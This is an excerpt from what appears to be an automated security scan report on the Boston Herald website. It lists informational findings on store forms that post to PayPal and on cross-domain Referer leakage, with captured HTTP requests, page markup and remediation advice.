The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<br />
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

7.19. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="images/Oct302007.jpg" align"right">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

7.20. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/images/siteImages/universal/soxBackCopies3.gif">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

8. Cross-domain Referer leakage  previous  next
There are 53 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


8.1. http://bostonherald.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?showResults=1#results HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:12:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 149923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/news/politics/view/20101108go_for_it_scott_brown_2012s_the_perfect_opportunity_for_prez_bid/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Go for it, Scott Brown!"></a>
...[SNIP]...
<a href="/news/regional/view/20101108grim_reality_for_funeral_business/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20101107/369b895a4c_funetease_11082010.jpg" alt="&#x2018;NOT QUITTING&#x2019; : Gary Dessert, a wood-flooring expert from
Dover who owns the Casket Store, has been fined by the state for
offering inexpensive burials without a funeral director&#x2019;s license.">
</a>
...[SNIP]...
<a href="/news/regional/view/20101108ts_form_rains_over_function_in_south_end/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20101107/e5caeeddd1_OnTheT_210x45.jpg" alt="ELEMENT-ARY: T riders brave the elements at a South End bus stop during a rain storm last week."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108ts_form_rains_over_function_in_south_end/format=comments&srvc=home&position=2">
...[SNIP]...
<a href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3"><img src="http://multimedia.heraldinteractive.com/images/promo/20101108/913f79de63_bradytease_11082010.jpg" alt="BROWNTRODDEN: New England Patriots quarterback Tom Brady reflects on what went wrong at the end of the fourth quarter while losing to the Cleveland Browns."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a
                        href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3">
...[SNIP]...
<a href="/sports/football/other_nfl/view/20101108aaron_rodgers_throws_3_tds_packers_rout_cowboys_45-7/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/590145_aaron_11082010.jpg" alt="Green Bay Packers quarterback Aaron Rodgers (12) breaks away from Dallas Cowboys linebacker Keith Brooking (51) for a first down during the first half."></a>
...[SNIP]...
<a href="/sports/other_sports/horse_racing/view/20101108zenyattas_no_loser_despite_finishing_2nd/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/c2266a_zen_11082010.jpg" alt="Garrett Gomez, right, reacts after riding Blame to victory during the Classic race at the Breeder&rsquo;s Cup horse races at Churchill Downs Saturday. Mike Smith, left, riding Zenyatta finished second."></a>
...[SNIP]...
<a href="/sports/soccer/general/view/20101108galaxy_beat_sounders_to_advance_in_playoffs/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/3e9f16_becks_11082010.jpg" alt="Los Angeles Galaxy midfielder David Beckham, left, celebrates defender Omar Gonzalez&rsquo;s goal against Seattle Sounders FC in the first half."></a>
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/business/real_estate/view/20101108salvatore_lupoli/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b6c328_sal_11082010.jpg" alt="LAWRENCE REVIVAL: Salvatore Lupoli, chief executive of Sal&#x2019;s Pizza, displays an aerial photo of his Riverwalk Properties
complex, where he has started on a second phase of construction.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/real_estate/view/20101108salvatore_lupoli/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg" alt="Robert &#x2018;Michele&#x2019; Kosilek.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/track/inside_track/view/20101108because_sassy_gay_friend_says_so/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b9b0fc_sassy_11082010.jpg" alt="&#x2018;Sassy Gay Friend&#x2019; YouTube star Brian Gallivan.">
</a>
...[SNIP]...
<a href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/c595ca_ltpconan20101108.jpg" alt="Conan O&rsquo;Brien returns tonight with &#x201C;Conan,&#x201D; running Monday through Thursdays at 11 p.m. on TBS.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/format=comments&srvc=home&position=7">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/sports/other_sports/general/view.bg?articleid=1294823&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1288456&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordan_177x57.gif" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2010/11/05/illegal-downloader-jammie-thomas-rasset-hit-with-15-million-fine/"><img src="http://multimedia.heraldinteractive.com/images/419a149cad_music07072009.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2010/11/06/kevin-garnett-dismisses-charlie-villanueva-as-a-nobody/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2010/11/kgscream.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2010/11/07/todays-patriots-starters-wilfork-at-end-pryor-at-nose-for-d-mankins-at-g-update-10-0-browns/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2010/11/brady-and-lloyd.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=2210"><img src="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/lifestyle/behind_the_wheel/?p=1147"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/behind_the_wheel/wp-content/uploads/2010/11/nashstreetrod.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2010/11/07/money-matters-taking-a-look-at-red-sox-payroll/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2010/11/theoheraldfile.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/high_school/index.php/2010/11/05/fridays-high-school-football-schedule-2/"><img src="http://cache.heraldinteractive.com/blogs/sports/high_school/wp-content/uploads/2010/11/img_0192.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2010/11/07/british-fear-factor-over-bay-state-jails/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2010/11/neil-entwistle.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=2367"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294819"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/49db30_seat_11082010.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/frontpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/backpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg" alt="GRIEVING: A friend hugs Shondell Davis, the aunt of the stabbing victim, in Roxbury yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/12.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/18.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/04.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg" alt="PARTING SHOT: Eric Mangini shakes hands with Bill Belichick after his Browns hammered the Patriots, 34-14, yesterday in Cleveland." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/format=comments&srvc=home&position=also">
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
